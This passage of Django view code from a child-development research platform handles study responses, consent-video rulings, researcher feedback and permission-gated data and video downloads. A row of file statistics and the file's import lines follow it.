                "study__salt",
                "study__hash_digits",
                "demographic_snapshot__uuid",
                "demographic_snapshot__created_at",
                "demographic_snapshot__number_of_children",
                "demographic_snapshot__child_birthdays",
                "demographic_snapshot__languages_spoken_at_home",
                "demographic_snapshot__number_of_guardians",
                "demographic_snapshot__number_of_guardians_explanation",
                "demographic_snapshot__race_identification",
                "demographic_snapshot__age",
                "demographic_snapshot__gender",
                "demographic_snapshot__education_level",
                "demographic_snapshot__spouse_education_level",
                "demographic_snapshot__annual_income",
                "demographic_snapshot__number_of_books",
                "demographic_snapshot__additional_comments",
                "demographic_snapshot__country",
                "demographic_snapshot__state",
                "demographic_snapshot__density",
                "demographic_snapshot__lookit_referrer",
                "demographic_snapshot__extra",
            )
        )
class StudyResponsesList(ResponseDownloadMixin, generic.ListView):
    """
    View to display a paginated list of study responses, with a per-response
    summary panel, attached videos, and feedback.
    """
    template_name = "studies/study_responses.html"
    def get_ordering(self):
        """
        Determine sort field and order. Sorting on id actually sorts on child id, not response id.
        Sorting on status, actually sorts on 'completed' field, where we are alphabetizing
        "in progress" and "completed"
        """
        orderby = self.request.GET.get("sort", "id")
        # NOTE(review): str.replace is substring-based, so any future sort value
        # containing "id" or "status" inside a longer name would be mangled here.
        # Current sort options appear to avoid this — confirm before adding more.
        return orderby.replace("id", "child__id").replace("status", "completed")
    def get_queryset(self):
        # Prefetch consent rulings (with arbiter) and feedback (newest first,
        # with researcher) so the template doesn't issue per-response queries.
        return (
            super()
            .get_queryset()
            .prefetch_related(
                "consent_rulings__arbiter",
                Prefetch(
                    "feedback",
                    queryset=Feedback.objects.select_related("researcher").order_by(
                        "-id"
                    ),
                ),
            )
        )
    def get_context_data(self, **kwargs):
        """
        In addition to the study, adds several items to the context dictionary. Study results
        are paginated.
        """
        context = super().get_context_data(**kwargs)
        context["study"] = study = self.study
        paginated_responses = context["object_list"]
        # Summary columns are configurable per study; table columns are fixed.
        columns_included_in_summary = study.columns_included_in_summary()
        columns_included_in_table = [
            "child__hashed_id",
            "response__uuid",
            "response__id",
            "response__status",
            "response__completed",
            "response__is_preview",
        ]
        response_data = []
        for resp in paginated_responses:
            # Info needed for table display of individual responses
            this_resp_data = {
                col.id: col.extractor(resp)
                for col in RESPONSE_COLUMNS
                if col.id in columns_included_in_table
            }
            # Exception - store actual date object for date created
            this_resp_data["response__date_created"] = resp.date_created
            # info needed for summary table shown at right
            this_resp_data["summary"] = [
                {
                    "name": col.name,
                    "value": col.extractor(resp),
                    "description": col.description,
                }
                for col in RESPONSE_COLUMNS
                if col.id in columns_included_in_summary
            ]
            this_resp_data["videos"] = resp.videos.values("pk", "full_name")
            # Shorten video names by eliding the study/response uuid segments.
            for v in this_resp_data["videos"]:
                v["display_name"] = (
                    v["full_name"]
                    .replace("videoStream_{}_".format(study.uuid), "...")
                    .replace("_{}_".format(resp.uuid), "...")
                )
            response_data.append(this_resp_data)
        context["response_data"] = response_data
        context["data_options"] = [col for col in RESPONSE_COLUMNS if col.optional]
        # Permission flags drive what the template exposes to this researcher.
        context["can_view_regular_responses"] = self.request.user.has_study_perms(
            StudyPermission.READ_STUDY_RESPONSE_DATA, context["study"]
        )
        context["can_view_preview_responses"] = self.request.user.has_study_perms(
            StudyPermission.READ_STUDY_PREVIEW_DATA, context["study"]
        )
        context["can_edit_feedback"] = self.request.user.has_study_perms(
            StudyPermission.EDIT_STUDY_FEEDBACK, context["study"]
        )
        return context
    def build_video_display_name(self, study_uuid, response_uuid, vid_name):
        """
        Strips study_uuid and response_uuid out of video responses titles for better display.
        NOTE(review): get_context_data above builds display names inline with a
        different elision ("..." vs ". . ."); this helper may be unused — verify.
        """
        return ". . ." + ". . .".join(
            vid_name.split(study_uuid + "_")[1].split("_" + response_uuid + "_")
        )
class StudySingleResponseDownload(ResponseDownloadMixin, View):
    """
    Download a single study response in the selected format with selected headers.

    GET params:
        data-type-selector: one of "json", "csv", "framedata".
        response_id: pk of the response to download.
        data_options: repeated; ids of optional header columns to include.

    Raises SuspiciousOperation (HTTP 400) on an unknown data type or a
    response id outside this researcher's accessible responses.
    """

    def get(self, *args, **kwargs):
        data_type = self.request.GET.get("data-type-selector", None)
        if data_type not in ["json", "csv", "framedata"]:
            raise SuspiciousOperation
        response_id = self.request.GET.get("response_id", None)
        try:
            resp = self.get_queryset().get(pk=response_id)
        except ObjectDoesNotExist:
            raise SuspiciousOperation
        study = self.study
        header_options = set(self.request.GET.getlist("data_options"))
        extension = "json" if data_type == "json" else "csv"
        # BUGFIX: the "_frames" suffix was previously attached when
        # data_type == "json"; it belongs on the frame-data CSV, matching the
        # "..._frames.csv" names produced by the per-session frame-data zip
        # download. JSON/CSV summaries instead get "_identifiable" when any
        # identifiable headers were requested.
        filename = "{}_{}{}.{}".format(
            study_name_for_files(study.name),
            str(resp.uuid),
            "_frames"
            if data_type == "framedata"
            else "_identifiable"
            if IDENTIFIABLE_DATA_HEADERS & header_options
            else "",
            extension,
        )
        if data_type == "json":
            cleaned_data = json.dumps(
                construct_response_dictionary(resp, RESPONSE_COLUMNS, header_options),
                indent="\t",
                default=str,
            )
        elif data_type == "csv":
            # One-row CSV: flatten the response, then pick headers per options.
            row_data = flatten_dict(
                {col.id: col.extractor(resp) for col in RESPONSE_COLUMNS}
            )
            header_list = get_response_headers(header_options, row_data.keys())
            output, writer = csv_dict_output_and_writer(header_list)
            writer.writerow(row_data)
            cleaned_data = output.getvalue()
        elif data_type == "framedata":
            cleaned_data = build_single_response_framedata_csv(resp)
        else:
            raise SuspiciousOperation
        response = HttpResponse(cleaned_data, content_type="text/{}".format(extension))
        response["Content-Disposition"] = 'attachment; filename="{}"'.format(filename)
        return response
class StudyResponseVideoAttachment(
    ResearcherLoginRequiredMixin, UserPassesTestMixin, StudyLookupMixin, View
):
    """
    View that redirects to a requested video for a study response
    (or proxies the bytes when ?mode=download is given).
    """
    raise_exception = True
    @cached_property
    def video(self):
        # Only select the video from consented videos for this study
        return self.study.videos_for_consented_responses.get(
            pk=self.kwargs.get("video")
        )
    def can_view_this_video(self):
        """Researchers may view a video only with the matching permission for
        its data class: response-data perm for real data, preview perm for previews."""
        user = self.request.user
        study = self.study
        video = self.video
        return user.is_researcher and (
            (
                user.has_study_perms(StudyPermission.READ_STUDY_RESPONSE_DATA, study)
                and not video.response.is_preview
            )
            or (
                user.has_study_perms(StudyPermission.READ_STUDY_PREVIEW_DATA, study)
                and video.response.is_preview
            )
        )
    test_func = can_view_this_video
    def get(self, request, *args, **kwargs):
        """Redirect to the video's download URL, or fetch and re-serve the
        bytes as an attachment when ?mode=download is requested."""
        video = self.video
        download_url = video.download_url
        if self.request.GET.get("mode") == "download":
            r = requests.get(download_url)
            # NOTE(review): File.open is called on the class with a BytesIO as
            # the implicit `self` — presumably File(io.BytesIO(...)) was
            # intended. It happens to return the BytesIO unchanged for an open
            # buffer, so the download works, but confirm and simplify.
            response = FileResponse(
                File.open(io.BytesIO(r.content)),
                filename=video.filename,
                as_attachment=True,
            )
            return response
        return redirect(download_url)
class StudyResponseSubmitFeedback(StudyLookupMixin, UserPassesTestMixin, View):
    """
    View to create or edit response feedback.
    """

    def user_can_edit_feedback(self):
        """Gate for feedback edits.

        Returns True only when the requesting user is a researcher holding
        EDIT_STUDY_FEEDBACK on this study, AND any feedback_id/response_id
        given in the POST data actually belongs to this study.
        """
        user = self.request.user
        study = self.study
        # First check user has permission to be editing feedback from this study at all.
        # BUGFIX: this was `if not user.is_researcher and user.has_study_perms(...)`,
        # which let ANY researcher through regardless of permission (and only
        # blocked non-researchers who *did* hold the permission). Sibling views
        # (video access, consent coding, preview deletion) all allow via
        # `user.is_researcher and user.has_study_perms(...)`.
        if not (
            user.is_researcher
            and user.has_study_perms(StudyPermission.EDIT_STUDY_FEEDBACK, study)
        ):
            return False
        # Check that the feedback_id (if given) is from this study
        feedback_id = self.request.POST.get("feedback_id", None)
        if feedback_id:
            try:
                feedback = Feedback.objects.get(id=feedback_id)
            except ObjectDoesNotExist:
                return False
            if feedback.response.study_id != study.pk:
                return False
        # Check that the response_id (if given) is from this study
        response_id = self.request.POST.get("response_id", None)
        if response_id:
            try:
                # ValueError covers a non-numeric response_id in the POST data:
                # deny (403) rather than crash with a 500.
                response = Response.objects.get(id=int(response_id))
            except (ObjectDoesNotExist, ValueError):
                return False
            if response.study_id != study.pk:
                return False
        return True

    test_func = user_can_edit_feedback

    def post(self, request, *args, **kwargs):
        """
        Create or edit feedback. Pass feedback_id to edit existing feedback, or response_id to create new
        feedback for that response.
        """
        form_data = self.request.POST
        user = self.request.user
        study = self.study
        feedback_id = form_data.get("feedback_id", None)
        comment = form_data.get("comment", "")
        if feedback_id:
            # Editing: update the comment on the existing feedback record.
            Feedback.objects.filter(id=feedback_id).update(comment=comment)
        else:
            # Creating: attach new feedback from this researcher to the response.
            response_id = int(form_data.get("response_id"))
            Feedback.objects.create(
                response_id=response_id, researcher=user, comment=comment
            )
        return HttpResponseRedirect(
            reverse("exp:study-responses-list", kwargs=dict(pk=study.pk))
        )
class StudyResponsesConsentManager(
    ResearcherLoginRequiredMixin,
    UserPassesTestMixin,
    SingleObjectFetchProtocol[Study],
    generic.DetailView,
):
    """Manage consent videos from here: approve or reject as evidence of informed consent."""
    template_name = "studies/study_responses_consent_ruling.html"
    queryset = Study.objects.all()
    raise_exception = True
    def user_can_code_consent(self):
        """Allow researchers who can code consent for real data OR for previews."""
        user = self.request.user
        study = self.get_object()
        return user.is_researcher and (
            user.has_study_perms(StudyPermission.CODE_STUDY_CONSENT, study)
            or user.has_study_perms(StudyPermission.CODE_STUDY_PREVIEW_CONSENT, study)
        )
    test_func = user_can_code_consent
    def get_context_data(self, **kwargs):
        """Load responses with current rulings/videos and build a JSON key/value
        store (keyed by response uuid) of details the template's JS consumes."""
        context = super().get_context_data(**kwargs)
        # Need to prefetch our responses with consent-footage videos.
        study = context["study"]
        # TODO: technically should not grant access to consent videos for preview data unless has that perm
        # (or should clearly indicate that code_study_consent means preview + actual data)
        preview_only = not self.request.user.has_study_perms(
            StudyPermission.CODE_STUDY_CONSENT, study
        )
        responses = get_responses_with_current_rulings_and_videos(
            study.id, preview_only
        )
        context["loaded_responses"] = responses
        context["summary_statistics"] = get_consent_statistics(study.id, preview_only)
        # Using a map for arbitrarily structured data - lists and objects that we can't just trivially shove onto
        # data-* properties in HTML
        response_key_value_store = {}
        paginator = Paginator(responses, RESPONSE_PAGE_SIZE)
        for page_num in paginator.page_range:
            page_of_responses = paginator.page(page_num)
            # two jobs - generate statistics and populate k/v store.
            for response in page_of_responses:
                # Both names refer to the same new dict: entries added to
                # response_json appear in the store under the response's uuid.
                response_json = response_key_value_store[str(response["uuid"])] = {}
                response["uuid"] = str(response.pop("uuid"))
                response_json["videos"] = response.pop("videos")
                # pop() below removes fields from the response dict as they are
                # copied into the details structure.
                response_json["details"] = {
                    "general": {
                        "uuid": response["uuid"],
                        "global_event_timings": json.dumps(
                            response.pop("global_event_timings")
                        ),
                        "sequence": json.dumps(response.pop("sequence")),
                        "completed": json.dumps(response.pop("completed")),
                        "date_created": str(response["date_created"]),
                    },
                    "participant": {
                        "hashed_id": hash_participant_id(response),
                        "uuid": str(response.pop("child__user__uuid")),
                        "nickname": response.pop("child__user__nickname"),
                    },
                    "child": {
                        "hashed_id": hash_child_id(response),
                        "uuid": str(response.pop("child__uuid")),
                        "name": response.pop("child__given_name"),
                        "birthday": str(response.pop("child__birthday")),
                        "gender": response.pop("child__gender"),
                        "additional_information": response.pop(
                            "child__additional_information"
                        ),
                    },
                }
        # TODO: Use json_script template tag to create JSON that can be used in Javascript
        # (see https://docs.djangoproject.com/en/3.0/ref/templates/builtins/#json-script)
        context["response_key_value_store"] = json.dumps(response_key_value_store)
        return context
    def post(self, request, *args, **kwargs):
        """This is where consent rulings are submitted."""
        form_data = self.request.POST
        user = self.request.user
        study = self.get_object()
        preview_only = not self.request.user.has_study_perms(
            StudyPermission.CODE_STUDY_CONSENT, study
        )
        # Only allow any action on preview responses unless full perms
        responses = study.responses
        if preview_only:
            responses = responses.filter(is_preview=True)
        # comments is a {response_uuid: comment} mapping from the form.
        comments = json.loads(form_data.get("comments"))
        # We now accept pending rulings to reverse old reject/approve decisions.
        for ruling in ("accepted", "rejected", "pending"):
            judged_responses = responses.filter(uuid__in=form_data.getlist(ruling))
            for response in judged_responses:
                response.consent_rulings.create(
                    action=ruling,
                    arbiter=user,
                    # pop() so leftover comments (without a new ruling) can be
                    # handled below.
                    comments=comments.pop(str(response.uuid), None),
                )
                response.save()
        # if there are any comments left over, these will count as new rulings that are the same as the last.
        if comments:
            for resp_uuid, comment in comments.items():
                response = responses.get(uuid=resp_uuid)
                response.consent_rulings.create(
                    action=response.most_recent_ruling, arbiter=user, comments=comment
                )
        return HttpResponseRedirect(
            reverse(
                "exp:study-responses-consent-manager",
                kwargs=dict(pk=self.get_object().pk),
            )
        )
    def get(self, request, *args, **kwargs):
        """External studies collect no consent footage, so there is nothing to code."""
        if self.get_object().study_type.is_external:
            messages.error(request, "There is no consent manager for external studies.")
            return HttpResponseRedirect(reverse("exp:study-detail", kwargs=kwargs))
        else:
            return super().get(request, *args, **kwargs)
class StudyResponsesAll(
    CanViewStudyResponsesMixin, SingleObjectFetchProtocol[Study], generic.DetailView
):
    """Page presenting the download options for response and child data.

    The page itself displays no data; it only links to the download views.
    """

    template_name = "studies/study_responses_all.html"
    queryset = Study.objects.all()
    http_method_names = ["get"]

    def get_context_data(self, **kwargs):
        """Add the response count, optional columns, and permission flags."""
        context = super().get_context_data(**kwargs)
        study = context["study"]
        user = self.request.user
        context["n_responses"] = study.responses_for_researcher(user).count()
        context["data_options"] = [
            column for column in RESPONSE_COLUMNS if column.optional
        ]
        for flag, permission in (
            ("can_delete_preview_data", StudyPermission.DELETE_ALL_PREVIEW_DATA),
            ("can_view_regular_responses", StudyPermission.READ_STUDY_RESPONSE_DATA),
            ("can_view_preview_responses", StudyPermission.READ_STUDY_PREVIEW_DATA),
        ):
            context[flag] = user.has_study_perms(permission, study)
        return context
class StudyDeletePreviewResponses(
    ResearcherLoginRequiredMixin,
    UserPassesTestMixin,
    SingleObjectFetchProtocol[Study],
    SingleObjectMixin,
    View,
):
    """Handles the 'delete all preview data' action for a study."""

    queryset = Study.objects.all()

    def user_can_delete_preview_data(self):
        """Allow only researchers holding the delete-preview-data permission."""
        user = self.request.user
        return user.is_researcher and user.has_study_perms(
            StudyPermission.DELETE_ALL_PREVIEW_DATA, self.get_object()
        )

    test_func = user_can_delete_preview_data

    def post(self, request, *args, **kwargs):
        """Delete every preview response for this study, consented or not."""
        study = self.get_object()
        preview_responses = study.responses.filter(is_preview=True).prefetch_related(
            "videos", "responselog_set", "consent_rulings", "feedback"
        )
        paginator = Paginator(preview_responses, RESPONSE_PAGE_SIZE)
        for page_number in paginator.page_range:
            for preview_response in paginator.page(page_number):
                # Cascades remove logs, consent rulings, feedback, and videos;
                # the video pre_delete hook also removes the files from S3.
                preview_response.delete()
        return HttpResponseRedirect(
            reverse("exp:study-responses-all", kwargs={"pk": study.id})
        )
class StudyResponsesJSON(ResponseDownloadMixin, generic.list.ListView):
    """
    Hitting this URL downloads all study responses in JSON format.
    """

    # Keep pages tiny: individual responses may be large and we never want the
    # JSON for 100 responses in memory at once.
    paginate_by = 1

    def make_chunk(self, paginator, page_num, header_options):
        """Serialize one page of responses as a fragment of the JSON array.

        The first page opens the array, the last page closes it, and every
        non-final page ends with a comma so the streamed fragments concatenate
        into valid JSON.
        """
        pieces = [
            json.dumps(
                construct_response_dictionary(resp, RESPONSE_COLUMNS, header_options),
                indent="\t",  # Use tab rather than spaces to make file smaller (ex. 60MB -> 25MB)
                default=str,
            )
            for resp in paginator.page(page_num)
        ]
        prefix = "[\n" if page_num == 1 else ""
        suffix = "\n]" if page_num == paginator.page_range[-1] else ",\n"
        return prefix + ",\n".join(pieces) + suffix

    def render_to_response(self, context, **response_kwargs):
        """Stream the JSON array chunk-by-chunk rather than building it whole."""
        paginator = context["paginator"]
        selected_options = set(self.request.GET.getlist("data_options"))
        filename = "{}_{}.json".format(
            study_name_for_files(self.study.name),
            "all-responses"
            + ("-identifiable" if IDENTIFIABLE_DATA_HEADERS & selected_options else ""),
        )
        chunk_stream = (
            self.make_chunk(paginator, page_num, selected_options)
            for page_num in paginator.page_range
        )
        response = StreamingHttpResponse(chunk_stream, content_type="text/json")
        response["Content-Disposition"] = 'attachment; filename="{}"'.format(filename)
        return response
class StudyResponsesCSV(ResponseDownloadMixin, generic.list.ListView):
    """
    Hitting this URL downloads a summary of all study responses in CSV format.
    """

    def render_to_response(self, context, **response_kwargs):
        """Build a one-row-per-response summary CSV and serve it as a download."""
        paginator = context["paginator"]
        study = self.study
        all_headers = set()
        rows = []
        for page_number in paginator.page_range:
            for resp in paginator.page(page_number):
                row = flatten_dict(
                    {col.id: col.extractor(resp) for col in RESPONSE_COLUMNS}
                )
                # Pick up any headers first seen in this session's data.
                all_headers |= row.keys()
                rows.append(row)
        selected_options = set(self.request.GET.getlist("data_options"))
        header_list = get_response_headers(selected_options, all_headers)
        output, writer = csv_dict_output_and_writer(header_list)
        writer.writerows(rows)
        filename = "{}_{}.csv".format(
            study_name_for_files(study.name),
            "all-responses"
            + ("-identifiable" if IDENTIFIABLE_DATA_HEADERS & selected_options else ""),
        )
        response = HttpResponse(output.getvalue(), content_type="text/csv")
        response["Content-Disposition"] = 'attachment; filename="{}"'.format(filename)
        return response
class StudyResponsesDictCSV(CanViewStudyResponsesMixin, View):
    """
    Hitting this URL downloads a data dictionary for the study response summary in CSV format. Does not depend on actual response data.
    """

    def build_summary_dict_csv(self, optional_headers_selected_ids):
        """Return CSV text describing each column of the overview CSV."""
        descriptions = {col.id: col.description for col in RESPONSE_COLUMNS}
        output, writer = csv_dict_output_and_writer(["column", "description"])
        writer.writerows(
            {"column": header, "description": descriptions[header]}
            for header in get_response_headers(
                optional_headers_selected_ids, descriptions.keys()
            )
        )
        return output.getvalue()

    def get(self, request, *args, **kwargs):
        """Serve the data dictionary as a CSV attachment."""
        study = self.study
        selected_options = self.request.GET.getlist("data_options")
        cleaned_data = self.build_summary_dict_csv(selected_options)
        filename = "{}_{}.csv".format(
            study_name_for_files(study.name), "all-responses-dict"
        )
        response = HttpResponse(cleaned_data, content_type="text/csv")
        response["Content-Disposition"] = 'attachment; filename="{}"'.format(filename)
        return response
class StudyChildrenCSV(ResponseDownloadMixin, generic.list.ListView):
    """
    Hitting this URL downloads a summary of all children who participated in CSV format.
    """

    def render_to_response(self, context, **response_kwargs):
        """Serve one CSV row per unique child across all of the study's responses.

        Rows keep the order in which children are first encountered; later
        responses from an already-seen child are skipped.
        """
        paginator = context["paginator"]
        study = self.study
        # Set membership is O(1); the previous list scan was O(n) per response.
        seen_child_ids = set()
        session_list = []
        for page_num in paginator.page_range:
            page_of_responses = paginator.page(page_num)
            for resp in page_of_responses:
                row_data = flatten_dict(
                    {
                        col.id: col.extractor(resp)
                        for col in RESPONSE_COLUMNS
                        if col.id in CHILD_CSV_HEADERS
                    }
                )
                # Only emit the first row seen for each child.
                child_id = row_data["child__global_id"]
                if child_id not in seen_child_ids:
                    seen_child_ids.add(child_id)
                    session_list.append(row_data)
        output, writer = csv_dict_output_and_writer(CHILD_CSV_HEADERS)
        writer.writerows(session_list)
        cleaned_data = output.getvalue()
        filename = "{}_{}.csv".format(
            study_name_for_files(study.name), "all-children-identifiable"
        )
        response = HttpResponse(cleaned_data, content_type="text/csv")
        response["Content-Disposition"] = 'attachment; filename="{}"'.format(filename)
        return response
class StudyChildrenDictCSV(CanViewStudyResponsesMixin, View):
    """
    Hitting this URL downloads a data dictionary in CSV format for the summary of children who participated.
    Does not depend on actual response data.
    TODO: separate from response data mixin
    """

    def build_child_dict_csv(self):
        """Return CSV text describing each column of the child-summary CSV."""
        output, writer = csv_dict_output_and_writer(["column", "description"])
        writer.writerows(
            {"column": col.id, "description": col.description}
            for col in RESPONSE_COLUMNS
            if col.id in CHILD_CSV_HEADERS
        )
        return output.getvalue()

    def get(self, request, *args, **kwargs):
        """Serve the child-summary data dictionary as a CSV attachment."""
        filename = "{}_{}.csv".format(
            study_name_for_files(self.study.name), "all-children-dict"
        )
        response = HttpResponse(self.build_child_dict_csv(), content_type="text/csv")
        response["Content-Disposition"] = 'attachment; filename="{}"'.format(filename)
        return response
class StudyResponsesFrameDataCSV(ResponseDownloadMixin, generic.list.ListView):
    """Hitting this URL downloads a ZIP file with frame data from one response per file in CSV format"""

    # TODO: with large files / many responses generation can take a while. Should generate asynchronously along
    # with the data dict.
    def render_to_response(self, context, **response_kwargs):
        """Bundle one frame-data CSV per response into an in-memory zip download."""
        paginator = context["paginator"]
        study = self.study
        # External studies run outside the frameplayer and have no frame data.
        if study.study_type.is_external:
            messages.error(
                self.request, "Frame data is not available for External Studies."
            )
            return redirect(reverse("exp:study-responses-all", kwargs={"pk": study.pk}))
        archive_buffer = io.BytesIO()
        with zipfile.ZipFile(archive_buffer, "w", zipfile.ZIP_DEFLATED) as archive:
            for page_number in paginator.page_range:
                for resp in paginator.page(page_number):
                    member_name = "{}_{}_{}.csv".format(
                        study_name_for_files(study.name), resp.uuid, "frames"
                    )
                    archive.writestr(
                        member_name, build_single_response_framedata_csv(resp)
                    )
        archive_buffer.seek(0)
        return FileResponse(
            archive_buffer,
            as_attachment=True,
            filename="{}_framedata_per_session.zip".format(
                study_name_for_files(study.name)
            ),
        )
class StudyResponsesFrameDataDictCSV(ResponseDownloadMixin, View):
    """
    Hitting this URL queues creation of a template data dictionary for frame-level data in CSV format.
    The file is put on GCP and a link is emailed to the user.
    """

    def get(self, request, *args, **kwargs):
        """Queue async generation of the frame-data dictionary, then redirect back."""
        study = self.study
        if study.study_type.is_external:
            messages.error(
                request, "Frame data dictionary is not available for external studies"
            )
        else:
            dict_filename = "{}_{}_{}".format(
                study_name_for_files(study.name), study.uuid, "all-frames-dict"
            )
            # Celery task: builds the dictionary, uploads it to GCP, and emails
            # the requesting user a link.
            build_framedata_dict.delay(
                dict_filename, study.uuid, self.request.user.uuid
            )
            messages.success(
                request,
                f"A frame data dictionary for {study.name} is being generated. You will be emailed a link when it's completed.",
            )
        return HttpResponseRedirect(
            reverse("exp:study-responses-all", kwargs=self.kwargs)
        )
class StudyDemographics(
    CanViewStudyResponsesMixin, SingleObjectFetchProtocol[Study], generic.DetailView
):
    """
    StudyDemographics view shows participant demographic snapshots associated
    with each response to the study
    """

    template_name = "studies/study_demographics.html"
    queryset = Study.objects.all()

    def get_context_data(self, **kwargs):
        """Add the response count and view-permission flags for the template."""
        context = super().get_context_data(**kwargs)
        study = context["study"]
        user = self.request.user
        context["n_responses"] = study.responses_for_researcher(user).count()
        context["can_view_regular_responses"] = user.has_study_perms(
            StudyPermission.READ_STUDY_RESPONSE_DATA, study
        )
        context["can_view_preview_responses"] = user.has_study_perms(
            StudyPermission.READ_STUDY_PREVIEW_DATA, study
        )
        return context
class StudyDemographicsJSON(DemographicDownloadMixin, generic.list.ListView):
    """
    Hitting this URL downloads all participant demographics in JSON format.
    """

    def render_to_response(self, context, **response_kwargs):
        """Serialize every demographic snapshot and serve them as one JSON array."""
        study = self.study
        selected_options = self.request.GET.getlist("demo_options")
        paginator = context["paginator"]
        snapshots = [
            json.dumps(
                construct_response_dictionary(
                    resp,
                    DEMOGRAPHIC_COLUMNS,
                    selected_options,
                    include_exp_data=False,
                ),
                indent="\t",
                default=str,
            )
            for page_number in paginator.page_range
            for resp in paginator.page(page_number)
        ]
        cleaned_data = f"[ {', '.join(snapshots)} ]"
        filename = "{}_{}.json".format(
            study_name_for_files(study.name), "all-demographic-snapshots"
        )
        response = HttpResponse(cleaned_data, content_type="text/json")
        response["Content-Disposition"] = 'attachment; filename="{}"'.format(filename)
        return response
class StudyDemographicsCSV(DemographicDownloadMixin, generic.list.ListView):
    """
    Hitting this URL downloads all participant demographics in CSV format.
    """

    def render_to_response(self, context, **response_kwargs):
        """Build one CSV row per demographic snapshot and serve it as a download."""
        study = self.study
        paginator = context["paginator"]
        selected_options = set(self.request.GET.getlist("demo_options"))
        csv_headers = get_demographic_headers(selected_options)
        rows = [
            {col.id: col.extractor(resp) for col in DEMOGRAPHIC_COLUMNS}
            for page_number in paginator.page_range
            for resp in paginator.page(page_number)
        ]
        output, writer = csv_dict_output_and_writer(csv_headers)
        writer.writerows(rows)
        filename = "{}_{}.csv".format(
            study_name_for_files(study.name), "all-demographic-snapshots"
        )
        response = HttpResponse(output.getvalue(), content_type="text/csv")
        response["Content-Disposition"] = 'attachment; filename="{}"'.format(filename)
        return response
class StudyDemographicsDictCSV(DemographicDownloadMixin, generic.list.ListView):
    """
    Hitting this URL downloads a data dictionary for participant demographics in CSV format.
    Does not depend on any actual data.
    """

    def render_to_response(self, context, **response_kwargs):
        """Describe each selected demographic column in a small CSV download."""
        selected_options = set(self.request.GET.getlist("demo_options"))
        included_headers = get_demographic_headers(selected_options)
        output, writer = csv_dict_output_and_writer(["column", "description"])
        writer.writerows(
            {"column": col.id, "description": col.description}
            for col in DEMOGRAPHIC_COLUMNS
            if col.id in included_headers
        )
        filename = "{}_{}.csv".format(
            study_name_for_files(self.study.name), "all-demographic-snapshots-dict"
        )
        response = HttpResponse(output.getvalue(), content_type="text/csv")
        response["Content-Disposition"] = 'attachment; filename="{}"'.format(filename)
        return response
class StudyCollisionCheck(ResponseDownloadMixin, View):
    """
    Hitting this URL checks for collisions among all child and account hashed IDs, and returns a string describing
    any collisions (empty string if none).
    """
    def get(self, request, *args, **kwargs):
        """Scan all consented responses, mapping each hashed id back to its
        global uuid; report any hashed id seen with two different uuids.
        Returns JSON: {"collisions": <description string, "" if none>}."""
        study = self.study
        responses = (
            study.consented_responses.order_by("id")
            .select_related("child", "child__user", "study")
            .values(
                "uuid",
                "child__uuid",
                "child__user__uuid",
                "study__uuid",
                "study__salt",
                "study__hash_digits",
            )
        )
        # hashed id -> first global uuid seen for it
        child_dict = {}
        account_dict = {}
        collision_text = ""
        # Note: could also just check number of unique global vs. hashed IDs in full dataset;
        # only checking one-by-one for more informative output.
        paginator = Paginator(responses, RESPONSE_PAGE_SIZE)
        for page_num in paginator.page_range:
            page_of_responses = paginator.page(page_num)
            for resp in page_of_responses:
                participant_hashed_id = hash_participant_id(resp)
                participant_global_id = resp["child__user__uuid"]
                child_hashed_id = hash_child_id(resp)
                child_global_id = resp["child__uuid"]
                if participant_hashed_id in account_dict:
                    if participant_global_id != account_dict[participant_hashed_id]:
                        collision_text += "Participant hashed ID {} ({}, {})\n".format(
                            participant_hashed_id,
                            account_dict[participant_hashed_id],
                            participant_global_id,
                        )
                else:
                    account_dict[participant_hashed_id] = participant_global_id
                if child_hashed_id in child_dict:
                    if child_global_id != child_dict[child_hashed_id]:
                        # NOTE(review): participant collisions end with "\n" but
                        # child collisions end with "<br>" — presumably one of
                        # these is a leftover; confirm what the consumer renders.
                        collision_text += "Child hashed ID {} ({}, {})<br>".format(
                            child_hashed_id,
                            child_dict[child_hashed_id],
                            child_global_id,
                        )
                else:
                    child_dict[child_hashed_id] = child_global_id
        return JsonResponse({"collisions": collision_text})
class StudyAttachments(CanViewStudyResponsesMixin, generic.ListView):
    """
    StudyAttachments View shows video attachments for the study
    """
    template_name = "studies/study_attachments.html"
    model = Video
    paginate_by = 100
    def get_ordering(self):
        # Default (and fallback for an empty ?sort= value) is newest first.
        return self.request.GET.get("sort", "-created_at") or "-created_at"
    def get_queryset(self):
        """Fetches all consented videos this user has access to.
        Returns:
            QuerySet: all videos from this study where response has been marked as
            consented and response is of a type (preview/actual data) that user can view
        Todo:
            * use a helper (e.g. in queries) select_videos_for_user to fetch the
            appropriate videos here and in build_zipfile_of_videos - deferring for the moment
            to work out dependencies.
        """
        study = self.study
        videos = study.videos_for_consented_responses
        # Restrict to whichever subset (preview vs. real data) the user may see.
        # A user with neither permission gets both mutually-exclusive filters
        # applied and therefore an empty queryset.
        if not self.request.user.has_study_perms(
            StudyPermission.READ_STUDY_RESPONSE_DATA, study
        ):
            videos = videos.filter(response__is_preview=True)
        if not self.request.user.has_study_perms(
            StudyPermission.READ_STUDY_PREVIEW_DATA, study
        ):
            videos = videos.filter(response__is_preview=False)
        # Optional case-insensitive substring filter on the video filename.
        match = self.request.GET.get("match", "")
        if match:
            videos = videos.filter(full_name__icontains=match)
        return videos.order_by(self.get_ordering())
    def get_context_data(self, **kwargs):
        """
        In addition to the study, adds several items to the context dictionary. Study results
        are paginated.
        """
        context = super().get_context_data(**kwargs)
        context["match"] = self.request.GET.get("match", "")
        context["study"] = self.study
        return context
    def post(self, request, *args, **kwargs):
        """
        Downloads study video
        """
        match = self.request.GET.get("match", "")
        study = self.study
        # Archive building runs as a background task (.delay) that emails the
        # requester a download link; the current "match" filter is honored.
        if self.request.POST.get("all-attachments"):
            build_zipfile_of_videos.delay(
                f"{study.uuid}_videos",
                study.uuid,
                match,
                self.request.user.uuid,
                consent_only=False,
            )
            messages.success(
                request,
                f"An archive of videos for {study.name} is being generated. You will be emailed a link when it's completed.",
            )
        if self.request.POST.get("all-consent-videos"):
            build_zipfile_of_videos.delay(
                f"{study.uuid}_consent_videos",
                study.uuid,
                match,
                self.request.user.uuid,
                consent_only=True,
            )
            messages.success(
                request,
                f"An archive of consent videos for {study.name} is being generated. You will be emailed a link when it's completed.",
            )
        return HttpResponseRedirect(
            reverse("exp:study-attachments", kwargs=self.kwargs)
        )
| 40.529175 | 135 | 0.624957 | import io
import json
import zipfile
from functools import cached_property
from typing import Callable, Dict, KeysView, List, NamedTuple, Set, Union
import requests
from django.contrib import messages
from django.contrib.auth.mixins import UserPassesTestMixin
from django.core.exceptions import ObjectDoesNotExist, SuspiciousOperation
from django.core.files import File
